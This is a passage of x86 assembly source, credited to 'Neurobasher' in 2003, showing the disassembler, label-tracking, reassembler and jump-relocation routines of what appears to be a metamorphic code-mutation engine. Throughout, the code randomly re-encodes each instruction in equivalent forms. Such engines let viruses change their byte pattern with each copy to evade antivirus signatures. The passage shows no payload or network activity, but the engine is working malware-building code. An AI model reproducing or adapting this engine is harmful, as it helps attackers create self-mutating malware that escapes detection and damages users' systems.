shr eax, 3
mov [edi+7], eax
mov edx, esi
add edx, 2
call DecodeMemoryConstruction
add esi, ebx
add esi, 2
jmp @@NextInstruction
@@Jcc32: mov eax, [esi+2]
add eax, esi
add eax, 6
jmp @@ContinueWithBranchInstr
@@CALL: mov eax, [esi+1]
add eax, esi
add eax, 5
jmp @@ContinueWithBranchInstr
@@Jcc: mov eax, [esi+1]
and eax, 0FFh
cmp eax, 7Fh
jbe @@Jcc_01
add eax, 0FFFFFF00h
@@Jcc_01:
add eax, esi
add eax, 2
@@ContinueWithBranchInstr:
mov ecx, eax
call SetInFutureLabelList
push eax
mov eax, [esi]
and eax, 0FFh
cmp eax, 0Fh
jz @@Jcc_Jcc32
cmp eax, 0E8h
jz @@Jcc_AddEIP5
jmp @@Jcc_AddEIP2
@@Jcc_Jcc32:
mov eax, [esi+1]
and eax, 0FFh
sub eax, 10h
@@Jcc_AddEIP6:
inc esi
@@Jcc_AddEIP5:
add esi, 3
@@Jcc_AddEIP2:
add esi, 2
mov edx, [edi]
and edx, 0FFFFFF00h
and eax, 0FFh
add eax, edx
mov [edi], eax
pop eax
or eax, eax
jz @@NextInstruction
call InsertLabel
mov [edi+1], edx
jmp @@NextInstruction
@@FinDeTraduccion:
ret
DisasmCode endp
SetInFutureLabelList proc
mov ebx, [ebp+InstructionTable]
cmp ebx, edi
jz @@SetFutureLabel
@@LoopCheckLabelForJcc:
cmp [ebx+0Ch], eax
jz @@Jcc_CodeDefined
add ebx, 10h
cmp ebx, edi
jnz @@LoopCheckLabelForJcc
@@SetFutureLabel:
mov edx, [ebp+NumberOfLabelsPost]
shl edx, 3
add edx, [ebp+FutureLabelTable]
mov [edx], eax
mov [edx+4], edi
mov eax, [ebp+NumberOfLabelsPost]
add eax, 1
mov [ebp+NumberOfLabelsPost], eax
xor eax, eax
@@Jcc_CodeDefined:
ret
SetInFutureLabelList endp
ReleaseFutureLabels proc
mov ecx, [ebp+NumberOfLabelsPost]
or ecx, ecx
jz @@DefineInstr
mov ebx, [ebp+FutureLabelTable]
@@LoopCheckFutureLabel:
cmp [ebx], esi
jz @@FutureLabelFound
@@OtherFutureLabel:
add ebx, 8
dec ecx
or ecx, ecx
jnz @@LoopCheckFutureLabel
@@DefineInstr:
ret
@@FutureLabelFound:
push ecx
push ebx
mov eax, esi
mov ebx, edi
call InsertLabel
pop ebx
mov eax, [ebx+4]
mov [eax+1], edx
xor ecx, ecx
mov [ebx], ecx
pop ecx
jmp @@OtherFutureLabel
ReleaseFutureLabels endp
InsertLabel proc
mov edx, [ebp+LabelTable]
mov ecx, [ebp+NumberOfLabels]
or ecx, ecx
jz @@Jcc_InsertLabel
@@Jcc_LoopLabel:
cmp [edx], eax
jz @@Jcc_LabelStillExists
add edx, 8
dec ecx
or ecx, ecx
jnz @@Jcc_LoopLabel
@@Jcc_InsertLabel:
mov [edx], eax
mov [edx+4], ebx
push eax
mov eax, [ebx+0Bh]
and eax, 0FFFFFF00h
add eax, 1
mov [ebx+0Bh], eax
mov eax, [ebp+NumberOfLabels]
add eax, 1
mov [ebp+NumberOfLabels], eax
pop eax
@@Jcc_LabelStillExists:
ret
InsertLabel endp
GenOp_SetRegReg proc
push edx
mov edx, [edi]
and edx, 0FFFFFF00h
mov eax, [esi]
and eax, 0FFh
cmp eax, 3Fh
jbe @@SRR_01
cmp eax, 85h
jbe @@SRR_02
cmp eax, 8Bh
jbe @@SRR_04
@@SRR_01: and eax, 38h
add eax, 1
@@SRR_Store:
add eax, edx
mov [edi], eax
pop edx
ret
@@SRR_02: mov eax, 48h+1
jmp @@SRR_Store
@@SRR_04: mov eax, 40h+1
jmp @@SRR_Store
GenOp_SetRegReg endp
;---------------------------------------------------------------------------------------
AssembleCode proc
xor eax, eax
mov [ebp+NumberOfJumpRelocations], eax
mov esi, [ebp+InstructionTable]
mov edi, [ebp+NewAssembledCode]
mov ecx, [ebp+NumberOfLabels]
mov edx, [ebp+LabelTable]
@@LoopSetLabel:
mov ebx, [edx+4]
mov eax, [ebx+0Bh]
or eax, 01h
mov [ebx+0Bh], eax
add edx, 8
dec ecx
or ecx, ecx
jnz @@LoopSetLabel
@@LoopAssemble_01:
mov eax, [esi+0Bh]
and eax, 0FFh
cmp eax, 1
jnz @@Assemble_Instruction
mov eax, [ebp+NumberOfLabels]
mov edx, [ebp+LabelTable]
@@LoopCheckLabel:
cmp [edx+4], esi
jnz @@CheckNextLabel
mov [edx], edi
@@CheckNextLabel:
add edx, 8
dec eax
or eax, eax
jnz @@LoopCheckLabel
@@Assemble_Instruction:
call AssembleInstruction
add esi, 10h
mov eax, [ebp+AddressOfLastInstruction]
cmp esi, eax
jb @@LoopAssemble_01
mov [ebp+AddressOfLastInstruction], edi
mov eax, edi
sub eax, [ebp+NewAssembledCode]
mov [ebp+SizeOfNewCode], eax
add eax, 20h
mov ebx, 0F000h
@@LoopGetRoundedSize:
add ebx, 1000h
cmp ebx, eax
jb @@LoopGetRoundedSize
mov [ebp+RoundedSizeOfNewCode], ebx
mov eax, 4000h
@@LoopGetSizeP2:
shl eax, 1
cmp eax, [ebp+SizeOfNewCode]
jb @@LoopGetSizeP2
mov [ebp+SizeOfNewCodeP2], eax
mov esi, [ebp+JumpRelocationTable]
mov ecx, [ebp+NumberOfJumpRelocations]
@@LoopReloc01:
mov edi, [esi]
mov eax, [esi+4]
mov eax, [eax]
mov edx, edi
add edx, 5
sub eax, edx
mov ebx, [edi]
and ebx, 0FFh
cmp ebx, 7Fh
jbe @@Short
cmp ebx, 0EBh
jz @@Short
mov [edi+1], eax
@@Next: sub ecx, 8
add esi, 8
or ecx, ecx
jnz @@LoopReloc01
ret
@@Short: add eax, 3
mov [edi+1], al
jmp @@Next
AssembleCode endp
Asm_AddToRelocTable proc
mov ebx, [ebp+JumpRelocationTable]
mov ecx, [ebp+NumberOfJumpRelocations]
add ebx, ecx
mov [ebx], edi
mov eax, [esi+1]
mov [ebx+4], eax
add ecx, 8
mov [ebp+NumberOfJumpRelocations], ecx
ret
Asm_AddToRelocTable endp
Asm_MakeMemoryAddress proc
mov ecx, [esi+1]
and ecx, 0FFh
mov eax, [esi+2]
and eax, 0FFh
cmp eax, ecx
jae @@Next00
mov edx, eax
jmp @@Next01
@@Next00: mov edx, ecx
mov ecx, eax
@@Next01: cmp edx, 8
jz @@NoIndex1
cmp ecx, 8
jz @@Only1Index
cmp ecx, 7
ja @@NoExchange
call Random
and eax, 1
jz @@NoExchange
mov eax, ecx
mov ecx, edx
mov edx, eax
@@NoExchange:
mov eax, [esi+3]
or eax, eax
jz @@2Index_0
cmp eax, 7Fh
jbe @@2Index_Byte
cmp eax, 0FFFFFF80h
jae @@2Index_Byte
@@2Index_Dword:
mov eax, 84h
@@2Index_Dword_Subr:
push eax
mov eax, ecx
and eax, 0C0h
shl ecx, 3
and ecx, 38h
add eax, ecx
add edx, eax
pop eax
jmp @@SetMemory01
@@2Index_Byte:
call Random
and eax, 1
jz @@2Index_Dword
mov eax, 44h
call @@2Index_Dword_Subr
sub edi, 3
ret
@@2Index_0:
call Random
and eax, 1
jz @@2Index_Byte
cmp edx, 5
jz @@2Index_Byte
mov eax, 04h
call @@2Index_Dword_Subr
sub edi, 4
ret
@@Only1Index:
mov eax, [esi+3]
or eax, eax
jz @@Only1Index_0
cmp eax, 7Fh
jbe @@Only1Index_Byte
cmp eax, 0FFFFFF80h
jae @@Only1Index_Byte
@@Only1Index_Dword:
call Random
and eax, 3
or eax, eax
jz @@Only1Index_Dword
cmp eax, 1
jz @@Only1Index_Dword_01
cmp eax, 2
jz @@Only1Index_Dword_02
@@Only1Index_Dword_03:
mov eax, 84h
add edx, 20h
jmp @@SetMemory01
@@Only1Index_Dword_02:
mov eax, 04h
shl edx, 3
add edx, 5
jmp @@SetMemory01
@@Only1Index_Dword_01:
add edx, 80h
add edx, ebx
mov [edi], edx
mov eax, [esi+3]
mov [edi+1], eax
add edi, 5
ret
@@Only1Index_Byte:
call Random
and eax, 1
jz @@Only1Index_Dword
call Random
and eax, 1
jz @@Only1Index_Byte_01
@@Only1Index_Byte_02:
mov eax, 44h
add eax, ebx
mov [edi], eax
add edx, 20h
mov [edi+1], edx
mov eax, [esi+3]
mov [edi+2], eax
add edi, 3
ret
@@Only1Index_Byte_01:
add edx, 40h
add edx, ebx
mov [edi], edx
mov eax, [esi+3]
mov [edi+1], eax
add edi, 2
ret
@@Only1Index_0:
call Random
and eax, 1
jz @@Only1Index_Byte
cmp edx, 5
jz @@Only1Index_Byte
add edx, ebx
mov [edi], edx
add edi, 1
ret
@@NoIndex1: cmp ecx, 8
jz @@DirectAddress
mov edx, ecx
and edx, 0C0h
and ecx, 7
shl ecx, 3
add edx, ecx
add edx, 5
mov eax, 4
@@SetMemory01:
add eax, ebx
mov [edi], eax
mov [edi+1], edx
mov eax, [esi+3]
mov [edi+2], eax
add edi, 6
ret
@@DirectAddress:
mov eax, 05h
add eax, ebx
mov [edi], eax
mov eax, [esi+3]
mov [edi+1], eax
add edi, 5
ret
Asm_MakeMemoryAddress endp
AssembleInstruction proc
mov [esi+0Ch], edi
mov eax, [esi]
and eax, 0FFh
cmp eax, 4Ch
ja @@Assemble_Next00
mov ebx, eax
and ebx, 0F8h
and eax, 7
or eax, eax
jz @@Assemble_OPRegImm
cmp eax, 1
jz @@Assemble_OPRegReg
cmp eax, 2
jz @@Assemble_OPRegMem
cmp eax, 3
jz @@Assemble_OPMemReg
@@Assemble_OPMemImm:
cmp ebx, 38h
jbe @@Assemble_OPMemImm_Normal
cmp ebx, 40h
jz @@Assemble_MOVMemImm
@@Assemble_TESTMemImm:
xor ebx, ebx
mov eax, 0F7h
jmp @@Assemble_OPMemImm_Normal_00
@@Assemble_MOVMemImm:
xor ebx, ebx
mov eax, 0C7h
jmp @@Assemble_OPMemImm_Normal_00
@@Assemble_OPMemImm_Normal:
mov eax, [esi+7]
cmp eax, 7Fh
jbe @@Assemble_OPMemImm_Normal_Byte
cmp eax, 0FFFFFF80h
jae @@Assemble_OPMemImm_Normal_Byte
@@Assemble_OPMemImm_Normal_Dword:
mov eax, 81h
@@Assemble_OPMemImm_Normal_00:
mov [edi], eax
add edi, 1
call Asm_MakeMemoryAddress
mov eax, [esi+7]
mov [edi], eax
add edi, 4
ret
@@Assemble_OPMemImm_Normal_Byte:
call Random
and eax, 1
jz @@Assemble_OPMemImm_Normal_Dword
mov eax, 83h
mov [edi], eax
add edi, 1
call Asm_MakeMemoryAddress
mov eax, [esi+7]
mov [edi], eax
add edi, 1
ret
@@Assemble_OPRegImm:
cmp ebx, 38h
jbe @@Assemble_OPRegImm_Normal
cmp ebx, 40h
jz @@Assemble_MOVRegImm
@@Assemble_TESTRegImm:
mov eax, [esi+1]
and eax, 7
or eax, eax
jnz @@Assemble_TESTRegImm_NotEAX
call Random
and eax, 1
jz @@Assemble_TESTRegImm_NotEAX
mov eax, 0A9h
jmp @@Assemble_OPRegImm_OneByteOpcode
@@Assemble_TESTRegImm_NotEAX:
mov eax, 0F7h
xor ebx, ebx
jmp @@Assemble_OPRegImm_Normal_01
@@Assemble_MOVRegImm:
call Random
and eax, 1
jz @@Assemble_MOVRegImm_OneByteOpcode
mov eax, 0C7h
xor ebx, ebx
jmp @@Assemble_OPRegImm_Normal_01
@@Assemble_MOVRegImm_OneByteOpcode:
mov eax, [esi+1]
add eax, 0B8h
jmp @@Assemble_OPRegImm_OneByteOpcode
@@Assemble_OPRegImm_Normal:
mov eax, [esi+1]
and eax, 7
or eax, eax
jnz @@Assemble_OPRegImm_Normal_00
call Random
and eax, 1
jz @@Assemble_OPRegImm_Normal_00
mov eax, ebx
add eax, 5
@@Assemble_OPRegImm_OneByteOpcode:
mov [edi], eax
mov eax, [esi+7]
mov [edi+1], eax
add edi, 5
ret
@@Assemble_OPRegImm_Normal_00:
mov eax, 81h
@@Assemble_OPRegImm_Normal_01:
mov [edi], eax
mov eax, [esi+1]
and eax, 7
add eax, 0C0h
add eax, ebx
mov [edi+1], eax
mov eax, [esi+7]
mov [edi+2], eax
add edi, 6
ret
@@Assemble_OPRegReg:
cmp ebx, 38h
jbe @@Assemble_OPRegReg_Normal
cmp ebx, 40h
jz @@Assemble_MOVRegReg
@@Assemble_TESTRegReg:
mov ebx, 85h
@@Assemble_TEST8RegReg_00:
call Random
and eax, 1
jz @@Assemble_OPRegReg_NextFF
jmp @@Assemble_OPRegReg_Inversed_2
@@Assemble_MOVRegReg:
mov ebx, 88h
@@Assemble_OPRegReg_Normal:
add ebx, 1
@@Assemble_OP8RegReg_Normal:
call Random
and eax, 1
jz @@Assemble_OPRegReg_Inversed
@@Assemble_OPRegReg_NextFF:
mov ecx, [esi+1]
mov edx, [esi+7]
jmp @@Assemble_OPRegReg_Next00
@@Assemble_OPRegReg_Inversed:
add ebx, 2
@@Assemble_OPRegReg_Inversed_2:
mov ecx, [esi+7]
mov edx, [esi+1]
@@Assemble_OPRegReg_Next00:
mov [edi], ebx
mov eax, ecx
shl eax, 3
add eax, 0C0h
add eax, edx
mov [edi+1], eax
add edi, 2
ret
@@Assemble_OPRegMem:
cmp ebx, 38h
jbe @@Assemble_OPRegMem_Normal
cmp ebx, 40h
jz @@Assemble_MOVRegMem
@@Assemble_TESTRegMem:
mov ebx, 85h
jmp @@Assemble_OPRegMem_Normal_00
@@Assemble_MOVRegMem:
mov ebx, 88h
@@Assemble_OPRegMem_Normal:
add ebx, 3
@@Assemble_OPRegMem_Normal_00:
mov [edi], ebx
add edi, 1
mov ebx, [esi+7]
and ebx, 7
shl ebx, 3
call Asm_MakeMemoryAddress
ret
@@Assemble_OPMemReg:
cmp ebx, 38h
jbe @@Assemble_OPMemReg_Normal
cmp ebx, 40h
jnz @@Assemble_TESTRegMem
@@Assemble_MOVMemReg:
mov ebx, 88h
@@Assemble_OPMemReg_Normal:
add ebx, 1
jmp @@Assemble_OPRegMem_Normal_00
@@Assemble_INCDECReg:
call Random
and eax, 1
jz @@Assemble_INCDECReg_2
@@Assemble_INCDECReg_1:
mov eax, [esi+7]
add eax, 40h
@@Assemble_INCDECReg_Common:
add eax, [esi+1]
mov [edi], eax
add edi, 1
ret
@@Assemble_INCDECReg_2:
mov eax, 0FFh
@@Assemble_INCDECReg_2_8b:
mov [edi], eax
add edi, 1
mov eax, [esi+7]
add eax, 0C0h
jmp @@Assemble_INCDECReg_Common
@@Assemble_INCDECReg_8b:
mov eax, 0FEh
jmp @@Assemble_INCDECReg_2_8b
@@Assemble_INCDECMem:
mov eax, 0FFh
@@Assemble_INCDECMem_2_8b:
mov [edi], eax
add edi, 1
mov ebx, [esi+7]
call Asm_MakeMemoryAddress
ret
@@Assemble_INCDECMem_8b:
mov eax, 0FEh
jmp @@Assemble_INCDECMem_2_8b
@@Assemble_Next00:
cmp eax, 4Eh
jz @@Assemble_INCDECReg
cmp eax, 4Eh+80h
jz @@Assemble_INCDECReg_8b
cmp eax, 4Fh
jz @@Assemble_INCDECMem
cmp eax, 4Fh+80h
jz @@Assemble_INCDECMem_8b
@@Assemble_Next00_:
cmp eax, 00h+80h
jb @@Assemble_Next01
cmp eax, 4Ch+80h
ja @@Assemble_Next01
mov ebx, eax
and ebx, 78h
and eax, 7
or eax, eax
jz @@Assemble_OP8RegImm
cmp eax, 1
jz @@Assemble_OP8RegReg
cmp eax, 2
jz @@Assemble_OP8RegMem
cmp eax, 3
jz @@Assemble_OP8MemReg
@@Assemble_OP8MemImm:
cmp ebx, 38h
jbe @@Assemble_OP8MemImm_Normal
cmp ebx, 40h
jz @@Assemble_MOV8MemImm
@@Assemble_TEST8MemImm:
xor ebx, ebx
mov eax, 0F6h
call @@Assemble_OPMemImm_Normal_00
sub edi, 3
ret
@@Assemble_MOV8MemImm:
xor ebx, ebx
mov eax, 0C6h
call @@Assemble_OPMemImm_Normal_00
sub edi, 3
ret
@@Assemble_OP8MemImm_Normal:
call Random
and eax, 2
add eax, 80h
call @@Assemble_OPMemImm_Normal_00
sub edi, 3
ret
@@Assemble_OP8RegImm:
cmp ebx, 38h
jbe @@Assemble_OP8RegImm_Normal
cmp ebx, 40h
jz @@Assemble_MOV8RegImm
@@Assemble_TEST8RegImm:
mov eax, [esi+1]
and eax, 7
or eax, eax
jnz @@Assemble_TEST8RegImm_NotEAX
call Random
and eax, 1
jz @@Assemble_TEST8RegImm_NotEAX
mov eax, 0A8h
call @@Assemble_OPRegImm_OneByteOpcode
sub edi, 3
ret
@@Assemble_TEST8RegImm_NotEAX:
mov eax, 0F6h
xor ebx, ebx
call @@Assemble_OPRegImm_Normal_01
sub edi, 3
ret
@@Assemble_MOV8RegImm:
call Random
and eax, 1
jz @@Assemble_MOV8RegImm_OneByteOpcode
mov eax, 0C6h
xor ebx, ebx
call @@Assemble_OPRegImm_Normal_01
sub edi, 3
ret
@@Assemble_MOV8RegImm_OneByteOpcode:
mov eax, [esi+1]
add eax, 0B0h
call @@Assemble_OPRegImm_OneByteOpcode
sub edi, 3
ret
@@Assemble_OP8RegImm_Normal:
mov eax, [esi+1]
and eax, 7
or eax, eax
jnz @@Assemble_OP8RegImm_Normal_00
call Random
and eax, 1
jz @@Assemble_OP8RegImm_Normal_00
mov eax, ebx
add eax, 4
call @@Assemble_OPRegImm_OneByteOpcode
sub edi, 3
ret
@@Assemble_OP8RegImm_Normal_00:
call Random
and eax, 2
add eax, 80h
call @@Assemble_OPRegImm_Normal_01
sub edi, 3
ret
@@Assemble_OP8RegReg:
cmp ebx, 38h
jbe @@Assemble_OP8RegReg_Normal
cmp ebx, 40h
jz @@Assemble_MOV8RegReg
@@Assemble_TEST8RegReg:
mov ebx, 84h
jmp @@Assemble_TEST8RegReg_00
@@Assemble_MOV8RegReg:
mov ebx, 88h
jmp @@Assemble_OP8RegReg_Normal
@@Assemble_OP8RegMem:
cmp ebx, 38h
jbe @@Assemble_OP8RegMem_Normal
cmp ebx, 40h
jz @@Assemble_MOV8RegMem
@@Assemble_TEST8RegMem:
mov ebx, 84h
jmp @@Assemble_OPRegMem_Normal_00
@@Assemble_MOV8RegMem:
mov ebx, 88h
@@Assemble_OP8RegMem_Normal:
add ebx, 2
jmp @@Assemble_OPRegMem_Normal_00
@@Assemble_OP8MemReg:
cmp ebx, 38h
jbe @@Assemble_OPRegMem_Normal_00
cmp ebx, 40h
jnz @@Assemble_TEST8RegMem
@@Assemble_MOV8MemReg:
mov ebx, 88h
jmp @@Assemble_OPRegMem_Normal_00
@@Assemble_Next01:
cmp eax, 50h
jnz @@Assemble_Next02
call Random
and eax, 1
jz @@Assemble_PUSHReg_2
@@Assemble_PUSHReg_1:
mov eax, [esi]
and eax, 0FFh
mov ebx, [esi+1]
add eax, ebx
@@Assemble_StoreByte:
mov [edi], eax
add edi, 1
ret
@@Assemble_PUSHReg_2:
mov eax, 0FFh
mov [edi], eax
mov eax, [esi+1]
add eax, 0F0h
mov [edi+1], eax
add edi, 2
ret
@@Assemble_Next02:
cmp eax, 58h
jnz @@Assemble_Next03
call Random
and eax, 1
jz @@Assemble_PUSHReg_1
@@Assemble_POPReg_2:
mov eax, 8Fh
mov [edi], eax
mov eax, [esi+1]
add eax, 0C0h
mov [edi+1], eax
add edi, 2
ret
@@Assemble_Next03:
cmp eax, 51h
jnz @@Assemble_Next04
mov eax, 0FFh
mov ebx, 30h
@@Assemble_POPMem:
mov [edi], eax
add edi, 1
call Asm_MakeMemoryAddress
ret
@@Assemble_Next04:
cmp eax, 59h
jnz @@Assemble_Next05
mov eax, 8Fh
xor ebx, ebx
jmp @@Assemble_POPMem
@@Assemble_Next05:
cmp eax, 68h
jnz @@Assemble_Next06
mov [edi], eax
mov eax, [esi+7]
cmp eax, 7Fh
jbe @@Assemble_PUSHImm_Byte
cmp eax, 0FFFFFF80h
jae @@Assemble_PUSHImm_Byte
@@Assemble_PUSHImm_Dword:
mov [edi+1], eax
add edi, 5
ret
@@Assemble_PUSHImm_Byte:
push eax
call Random
and eax, 1
pop eax
or ebx, ebx
jz @@Assemble_PUSHImm_Dword
mov ebx, 6Ah
mov [edi], ebx
mov [edi+1], eax
add edi, 2
ret
@@Assemble_Next06:
cmp eax, 0E0h
jnz @@Assemble_Next07
mov ebx, 0D0h
@@Assemble_NEG32Reg:
mov eax, 0F7h
@@Assemble_Nxx8Reg:
mov [edi], eax
mov eax, [esi+1]
add eax, ebx
mov [edi+1], eax
add edi, 2
ret
@@Assemble_Next07:
cmp eax, 0E4h
jnz @@Assemble_Next08
mov ebx, 0D8h
jmp @@Assemble_NEG32Reg
@@Assemble_Next08:
cmp eax, 0E2h
jnz @@Assemble_Next09
mov ebx, 0D0h
@@Assemble_NEG8Reg:
mov eax, 0F6h
jmp @@Assemble_Nxx8Reg
@@Assemble_Next09:
cmp eax, 0E6h
jnz @@Assemble_Next10
mov ebx, 0D8h
jmp @@Assemble_NEG8Reg
@@Assemble_Next10:
cmp eax, 0E1h
jnz @@Assemble_Next11
mov ebx, 10h
@@Assemble_NEG32Mem:
mov eax, 0F7h
@@Assemble_Nxx8Mem:
mov [edi], eax
add edi, 1
call Asm_MakeMemoryAddress
ret
@@Assemble_Next11:
cmp eax, 0E5h
jnz @@Assemble_Next12
mov ebx, 18h
jmp @@Assemble_NEG32Mem
@@Assemble_Next12:
cmp eax, 0E3h
jnz @@Assemble_Next13
mov ebx, 10h
@@Assemble_NEG8Mem:
mov eax, 0F6h
jmp @@Assemble_Nxx8Mem
@@Assemble_Next13:
cmp eax, 0E7h
jnz @@Assemble_Next14
mov ebx, 18h
jmp @@Assemble_NEG8Mem
@@Assemble_Next14:
cmp eax, 0EAh
jnz @@Assemble_Next15
mov eax, 0FFh
mov ebx, 10h
jmp @@Assemble_Nxx8Mem
@@Assemble_Next15:
cmp eax, 0EBh
jnz @@Assemble_Next16
mov eax, 0FFh
mov ebx, 20h
jmp @@Assemble_Nxx8Mem
@@Assemble_Next16:
cmp eax, 0ECh
jnz @@Assemble_Next17
mov eax, 0FFh
mov ebx, 0D0h
jmp @@Assemble_Nxx8Reg
@@Assemble_Next17:
cmp eax, 0EDh
jnz @@Assemble_Next18
mov eax, 0FFh
mov ebx, 0E0h
jmp @@Assemble_Nxx8Reg
@@Assemble_Next18:
cmp eax, 0F0h
jnz @@Assemble_Next19
mov eax, [esi+7]
and eax, 0FFh
cmp eax, 1
jz @@Assemble_SHIFT_1
@@Assemble_SHIFT_2:
mov ecx, 0C1h
mov edx, 0E0h
@@Assemble_SHIFT8_1_00:
call @@Assemble_SHIFT_x
mov ebx, [esi+7]
and ebx, 0FFh
call Random
and eax, edx
add eax, ebx
mov [edi], eax
add edi, 1
ret
@@Assemble_SHIFT_1:
call Random
and eax, 1
jz @@Assemble_SHIFT_2
mov ecx, 0D1h
@@Assemble_SHIFT_x:
mov [edi], ecx
add edi, 1
mov ebx, [esi+8]
and ebx, 8
add ebx, 0C0h
call Random
and eax, 20h
add ebx, eax
mov eax, [esi+1]
and eax, 7
add eax, ebx
mov [edi], eax
add edi, 1
ret
@@Assemble_Next19:
cmp eax, 0F2h
jnz @@Assemble_Next20
mov eax, [esi+7]
and eax, 0FFh
cmp eax, 1
jz @@Assemble_SHIFT8_1
@@Assemble_SHIFT8_2:
mov ecx, 0C0h
xor edx, edx
jmp @@Assemble_SHIFT8_1_00
@@Assemble_SHIFT8_1:
call Random
and eax, 1
jz @@Assemble_SHIFT8_2
mov ecx, 0D0h
jmp @@Assemble_SHIFT_x
@@Assemble_Next20:
cmp eax, 0F1h
jnz @@Assemble_Next21
mov eax, [esi+7]
and eax, 0FFh
cmp eax, 1
jz @@Assemble_SHIFTMem_1
@@Assemble_SHIFTMem_2:
mov ecx, 0C1h
mov edx, 0E0h
@@Assemble_SHIFT8Mem_1_00:
push edx
call @@Assemble_SHIFTMem_x
pop edx
mov ebx, [esi+7]
and ebx, 0FFh
call Random
and eax, edx
add eax, ebx
mov [edi], eax
add edi, 1
ret
@@Assemble_SHIFTMem_1:
call Random
or eax, eax
jz @@Assemble_SHIFTMem_2
mov ecx, 0D1h
@@Assemble_SHIFTMem_x:
mov [edi], ecx
add edi, 1
mov ebx, [esi+8]
and ebx, 8
call Random
and eax, 20h
add ebx, eax
call Asm_MakeMemoryAddress
ret
@@Assemble_Next21:
cmp eax, 0F3h
jnz @@Assemble_Next22
mov eax, [esi+7]
and eax, 0FFh
cmp eax, 1
jz @@Assemble_SHIFT8Mem_1
@@Assemble_SHIFT8Mem_2:
mov ecx, 0C0h
xor edx, edx
jmp @@Assemble_SHIFT8Mem_1_00
@@Assemble_SHIFT8Mem_1:
call Random
and eax, 1
jz @@Assemble_SHIFT8Mem_2
mov ecx, 0D0h
jmp @@Assemble_SHIFTMem_x
@@Assemble_Next22:
cmp eax, 0FCh
jnz @@Assemble_Next23
mov eax, 8Dh
mov [edi], eax
add edi, 1
mov ebx, [esi+7]
and ebx, 7
shl ebx, 3
call Asm_MakeMemoryAddress
ret
@@Assemble_Next23:
cmp eax, 0FDh
jnz @@Assemble_Next24
mov eax, [esi+1]
jmp @@Assemble_StoreByte
@@Assemble_Next24:
cmp eax, 0FEh
jnz @@Assemble_Next25
mov eax, 0C3h
jmp @@Assemble_StoreByte
@@Assemble_Next25:
cmp eax, 0FFh
jnz @@Assemble_Next26
mov eax, 90h
jmp @@Assemble_StoreByte
@@Assemble_Next26:
cmp eax, 70h
jb @@Assemble_Next27
cmp eax, 7Fh
ja @@Assemble_Next27
mov eax, [esi+7]
or eax, eax
jz @@Assemble_Jump_Normal
mov eax, [esi]
xor eax, 1
mov [edi], eax
add edi, 1
push edi
add edi, 1
mov eax, 0E9h
mov [esi], al
call @@Assemble_Jump_Normal
pop ebx
mov eax, edi
sub eax, ebx
sub eax, 1
mov [ebx], al
ret
@@Assemble_Next27:
cmp eax, 0F8h
jnz @@Assemble_Next28
mov eax, 0B60Fh
mov [edi], eax
add edi, 2
mov ebx, [esi+7]
and ebx, 7
shl ebx, 3
call Asm_MakeMemoryAddress
ret
@@Assemble_Next28:
@@Assemble_Jump_Normal:
mov ebx, [esi+1]
mov eax, [ebx+4]
cmp eax, esi
jb @@Assemble_Jump_Backwards
@@Assemble_Jump_Fowards:
mov ebx, eax
sub ebx, esi
cmp ebx, 0B0h
jbe @@Assemble_JmpFwd_Short
@@Assemble_JmpFwd_Long_Set00:
mov eax, [esi]
and eax, 0FFh
cmp eax, 7Fh
jbe @@Assemble_JmpFwd_Long_Jcc
@@Assemble_JmpFwd_Long_Set:
mov [edi], eax
call Asm_AddToRelocTable
add edi, 5
ret
@@Assemble_JmpFwd_Long_Jcc:
mov eax, 0Fh
mov [edi], eax
add edi, 1
mov eax, [esi]
add eax, 10h
jmp @@Assemble_JmpFwd_Long_Set
@@Assemble_JmpFwd_Short:
call Random
and eax, 4
or eax, eax
jz @@Assemble_JmpFwd_Long_Set00
mov eax, [esi]
and eax, 0FFh
cmp eax, 0E8h
jz @@Assemble_JmpFwd_Long_Set
cmp eax, 0E9h
jz @@Assemble_JmpFwd_Short_JMP
@@Assemble_JmpFwd_Short_Set:
mov [edi], eax
call Asm_AddToRelocTable
add edi, 2
ret
@@Assemble_JmpFwd_Short_JMP:
add eax, 2
jmp @@Assemble_JmpFwd_Short_Set
@@Assemble_Jump_Backwards:
mov ebx, [eax+0Ch]
sub ebx, edi
sub ebx, 2
cmp ebx, 0FFFFFF80h
jb @@Assemble_Jump_Backwards_Long
mov eax, [esi]
cmp al, 0E8h
jz @@Assemble_Jump_Backwards_Long
call Random
and eax, 7
or eax, eax
jz @@Assemble_Jump_Backwards_Long
mov eax, [esi]
cmp al, 0E9h
jnz @@Assemble_Jump_StoreOpcode_Short
add eax, 2
@@Assemble_Jump_StoreOpcode_Short:
mov [edi], eax
add edi, 1
mov [edi], ebx
add edi, 1
ret
@@Assemble_Jump_Backwards_Long:
mov eax, [esi]
cmp al, 0E9h
jz @@Assemble_Jump_Backwards_JMP
cmp al, 0E8h
jz @@Assemble_Jump_Backwards_JMP
sub ebx, 4
mov eax, 0Fh
mov [edi], eax
add edi, 1
mov eax, [esi]
add eax, 10h
@@Assemble_Jump_Backwards_Long_Common:
mov [edi], eax
add edi, 1
mov [edi], ebx
add edi, 4
ret
@@Assemble_Jump_Backwards_JMP:
sub ebx, 3
jmp @@Assemble_Jump_Backwards_Long_Common
ret
AssembleInstruction endp
EndOfCode label dword
end PreMain
(c) Neurobasher/Germany, somewhere on April 2003
View Git Blame Copy Permalink